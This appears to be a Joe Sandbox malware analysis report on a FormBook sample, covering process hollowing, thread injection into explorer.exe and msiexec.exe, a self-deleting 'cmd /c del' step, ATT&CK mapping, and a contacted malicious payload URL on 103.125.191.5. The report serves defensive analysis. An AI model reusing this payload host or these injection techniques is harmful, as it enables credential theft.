    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0516FF10 mov eax, dword ptr fs:[00000030h]13_2_0516FF10
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A070D mov eax, dword ptr fs:[00000030h]13_2_051A070D
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A070D mov eax, dword ptr fs:[00000030h]13_2_051A070D
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FF716 mov eax, dword ptr fs:[00000030h]13_2_050FF716
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A70E mov eax, dword ptr fs:[00000030h]13_2_0510A70E
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A70E mov eax, dword ptr fs:[00000030h]13_2_0510A70E
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510E730 mov eax, dword ptr fs:[00000030h]13_2_0510E730
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D4F2E mov eax, dword ptr fs:[00000030h]13_2_050D4F2E
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D4F2E mov eax, dword ptr fs:[00000030h]13_2_050D4F2E
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EEF40 mov eax, dword ptr fs:[00000030h]13_2_050EEF40
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EFF60 mov eax, dword ptr fs:[00000030h]13_2_050EFF60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A8F6A mov eax, dword ptr fs:[00000030h]13_2_051A8F6A
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157794 mov eax, dword ptr fs:[00000030h]13_2_05157794
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157794 mov eax, dword ptr fs:[00000030h]13_2_05157794
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157794 mov eax, dword ptr fs:[00000030h]13_2_05157794
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E8794 mov eax, dword ptr fs:[00000030h]13_2_050E8794
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051137F5 mov eax, dword ptr fs:[00000030h]13_2_051137F5
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A61C mov eax, dword ptr fs:[00000030h]13_2_0510A61C
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A61C mov eax, dword ptr fs:[00000030h]13_2_0510A61C
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DC600 mov eax, dword ptr fs:[00000030h]13_2_050DC600
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DC600 mov eax, dword ptr fs:[00000030h]13_2_050DC600
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DC600 mov eax, dword ptr fs:[00000030h]13_2_050DC600
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05108E00 mov eax, dword ptr fs:[00000030h]13_2_05108E00
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191608 mov eax, dword ptr fs:[00000030h]13_2_05191608
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0518FE3F mov eax, dword ptr fs:[00000030h]13_2_0518FE3F
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DE620 mov eax, dword ptr fs:[00000030h]13_2_050DE620
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]13_2_050E7E41
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]13_2_050E7E41
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]13_2_050E7E41
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]13_2_050E7E41
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]13_2_050E7E41
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]13_2_050E7E41
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519AE44 mov eax, dword ptr fs:[00000030h]13_2_0519AE44
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519AE44 mov eax, dword ptr fs:[00000030h]13_2_0519AE44
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E766D mov eax, dword ptr fs:[00000030h]13_2_050E766D
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]13_2_050FAE73
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]13_2_050FAE73
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]13_2_050FAE73
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]13_2_050FAE73
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]13_2_050FAE73
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0516FE87 mov eax, dword ptr fs:[00000030h]13_2_0516FE87
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051546A7 mov eax, dword ptr fs:[00000030h]13_2_051546A7
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A0EA5 mov eax, dword ptr fs:[00000030h]13_2_051A0EA5
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A0EA5 mov eax, dword ptr fs:[00000030h]13_2_051A0EA5
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A0EA5 mov eax, dword ptr fs:[00000030h]13_2_051A0EA5
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A8ED6 mov eax, dword ptr fs:[00000030h]13_2_051A8ED6
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05118EC7 mov eax, dword ptr fs:[00000030h]13_2_05118EC7
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0518FEC0 mov eax, dword ptr fs:[00000030h]13_2_0518FEC0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051036CC mov eax, dword ptr fs:[00000030h]13_2_051036CC
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E76E2 mov eax, dword ptr fs:[00000030h]13_2_050E76E2
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051016E0 mov ecx, dword ptr fs:[00000030h]13_2_051016E0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D9100 mov eax, dword ptr fs:[00000030h]13_2_050D9100
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D9100 mov eax, dword ptr fs:[00000030h]13_2_050D9100
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D9100 mov eax, dword ptr fs:[00000030h]13_2_050D9100
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510513A mov eax, dword ptr fs:[00000030h]13_2_0510513A
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510513A mov eax, dword ptr fs:[00000030h]13_2_0510513A
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]13_2_050F4120
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]13_2_050F4120
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]13_2_050F4120
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]13_2_050F4120
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov ecx, dword ptr fs:[00000030h]13_2_050F4120
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FB944 mov eax, dword ptr fs:[00000030h]13_2_050FB944
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FB944 mov eax, dword ptr fs:[00000030h]13_2_050FB944
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DC962 mov eax, dword ptr fs:[00000030h]13_2_050DC962
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB171 mov eax, dword ptr fs:[00000030h]13_2_050DB171
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB171 mov eax, dword ptr fs:[00000030h]13_2_050DB171
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05102990 mov eax, dword ptr fs:[00000030h]13_2_05102990
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FC182 mov eax, dword ptr fs:[00000030h]13_2_050FC182
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A185 mov eax, dword ptr fs:[00000030h]13_2_0510A185
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]13_2_051551BE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]13_2_051551BE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]13_2_051551BE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]13_2_051551BE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051061A0 mov eax, dword ptr fs:[00000030h]13_2_051061A0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051061A0 mov eax, dword ptr fs:[00000030h]13_2_051061A0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051569A6 mov eax, dword ptr fs:[00000030h]13_2_051569A6
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]13_2_051949A4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]13_2_051949A4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]13_2_051949A4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]13_2_051949A4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB1E1 mov eax, dword ptr fs:[00000030h]13_2_050DB1E1
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB1E1 mov eax, dword ptr fs:[00000030h]13_2_050DB1E1
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB1E1 mov eax, dword ptr fs:[00000030h]13_2_050DB1E1
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051641E8 mov eax, dword ptr fs:[00000030h]13_2_051641E8
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157016 mov eax, dword ptr fs:[00000030h]13_2_05157016
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157016 mov eax, dword ptr fs:[00000030h]13_2_05157016
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157016 mov eax, dword ptr fs:[00000030h]13_2_05157016
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A4015 mov eax, dword ptr fs:[00000030h]13_2_051A4015
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A4015 mov eax, dword ptr fs:[00000030h]13_2_051A4015
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]13_2_050EB02A
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]13_2_050EB02A
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]13_2_050EB02A
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]13_2_050EB02A
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510002D mov eax, dword ptr fs:[00000030h]13_2_0510002D
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510002D mov eax, dword ptr fs:[00000030h]13_2_0510002D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
    Modifies the context of a thread in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread register set: target process: 3424Jump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread register set: target process: 3424Jump to behavior
    Queues an APC in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
    Sample uses process hollowing techniqueShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1240000Jump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe' Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'Jump to behavior
    Source: explorer.exe, 0000000A.00000000.882628410.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

    Stealing of Sensitive Information:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY
    Yara detected Generic DropperShow sources
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6680, type: MEMORY

    Remote Access Functionality:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsShared Modules1DLL Side-Loading1Process Injection412Virtualization/Sandbox Evasion21OS Credential DumpingSecurity Software Discovery621Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection412LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSSystem Information Discovery21Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    2eD17GZuWs.exe25%VirustotalBrowse
    2eD17GZuWs.exe2%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://103.125.191.5/bin_xMjelaYnr43.binY0%Avira URL Cloudsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://103.125.191.5/4%VirustotalBrowse
    http://103.125.191.5/0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
    https://in_xMjelaYnr43.bin0%Avira URL Cloudsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://103.125.191.5/bin_xMjelaYnr43.bin0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://103.125.191.5/bin_xMjelaYnr43.bintrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
      		high
      http://www.fontbureau.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
        		high
        http://www.fontbureau.com/designersGexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
          		high
          http://www.fontbureau.com/designers/?explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
            		high
            http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.fontbureau.com/designers?explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
              		high
              http://www.tiro.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://103.125.191.5/bin_xMjelaYnr43.binY2eD17GZuWs.exe, 00000001.00000002.928446229.0000000000924000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                		high
                http://www.goodfont.co.krexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.carterandcone.comlexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.sajatypeworks.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.typography.netDexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  		high
                  http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://fontfabrik.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cnexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                    		high
                    http://103.125.191.5/2eD17GZuWs.exe, 00000001.00000002.928458563.000000000093D000.00000004.00000020.sdmpfalse
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://in_xMjelaYnr43.bin2eD17GZuWs.exe, 00000001.00000002.928394579.00000000008F7000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers8explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.%s.comPAexplorer.exe, 0000000A.00000002.935388452.0000000002B50000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		low
                      http://www.fonts.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.sandoll.co.krexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.urwpp.deDPleaseexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.zhongyicts.com.cnexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.sakkal.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        103.125.191.5
                        		unknownViet Nam
                        		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:320425
                        Start date:19.11.2020
                        Start time:10:47:26
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 39s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:2eD17GZuWs.exe
                        Cookbook file name:default.jbs
